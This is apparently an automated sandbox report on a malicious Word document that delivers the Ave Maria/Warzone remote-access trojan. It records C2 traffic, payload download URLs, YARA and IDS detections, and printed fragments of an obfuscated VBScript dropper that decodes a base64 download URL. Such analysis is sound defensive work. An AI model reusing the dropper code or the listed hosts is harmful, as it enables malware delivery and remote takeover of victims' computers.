Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 159.223.2.212:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic DNS query: name: login.929389.ankura.us
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 159.223.2.212:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 159.223.2.212:80

Networking

Source: Traffic Snort IDS: 2852326 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2036735 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2852327 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Traffic Snort IDS: 2036734 ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Traffic Snort IDS: 2852329 ETPRO TROJAN Ave Maria/Warzone RAT PingCommand 20.126.95.155:7800 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2852328 ETPRO TROJAN Ave Maria/Warzone RAT PingResponse 192.168.2.22:49173 -> 20.126.95.155:7800
Source: Malware configuration extractor URLs: 20.126.95.155
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Host: login.929389.ankura.usConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /AwOgYiWG/explorer.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: login.929389.ankura.usConnection: Keep-Alive
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View ASN Name: CELANESE-US CELANESE-US
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 20.126.95.155:7800
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929
Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ank
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/Aw
Source: powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exe
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.945493168.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.985143233.0000000003643000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: httP://login.929389.ankura.us/AwOgYiWG/explorer.exePE
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.922726566.00000000035E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://login.929389.ankura.us
Source: powershell.exe, 00000004.00000002.922412299.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.926952704.000000001B39C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://login.929389.ankura.us/AwOgYiWG/explorer.exe
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032698870.000000000289A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000009.00000002.936831112.000000000038E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CEE7D2D-9EE4-4FEB-932A-E7FDD2AB9079}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: login.929389.ankura.us
Source: unknown TCP traffic detected without corresponding DNS query: 20.126.95.155
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud

Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc, type: SAMPLE Matched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
Source: 17.3.MSBuild.exe.6a5d90.1.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr Stream path '_1725425945/\x1Ole10Native' : :....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT..... ...C:\9jkepaD\DZdtfhgYgeghD{.scT.s....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987234:execute(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ec" + "ute" + "(var1)".. 
dim a32947234987236:execute sn556.... age64Procode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....function BytesToStr(ByVal byteArray, ByVal xtexenc).. lfkfdiooie = "utf".. lfkfdiooie = lfkfdiooie + "-16le".. If LCase(xtexenc) = lfkfdiooie then.. ' UTF-16 LE happens to be VBScript's internal encoding, so we can.. ' take a shortcut and use CStr() to directly convert the byte array.. ' to a string... knrudogh = "BytesToStr = CStr(byteArray)".. var1 = knrudogh.. sn556 = "ex" + "ec" + "ute" + "(var1)".. kjkxvlsvllf=0:execute sn556.. Else ' Convert the specified text encoding to a VBScript string... ' Create a binary stream and copy the input byte array to it... vgct783hth = "bj".. vgct783hth = vgct783hth + "ect".. piiing = "CreateO" + vgct783hth.. ldiwuywfj = "Set ".. lsvosfouwoupwiot = ldiwuywfj + "baax = " + piiing + "(aaax)".... var1 = lsvosfouwoupwiot.. sn556 = "ex" + "ecute(var1)"..
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr Stream path '_1725426018/\x1Ole10Native' : ;....DZdtfhgYgeghD{.scT.C:\osdsTggH\DZdtfhgYgeghD{.scT.....6...C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{.scT.w:....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"").C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + cvbnm + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ec" + "ute" + "(var1)".. dim a32947234987235:execute sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = 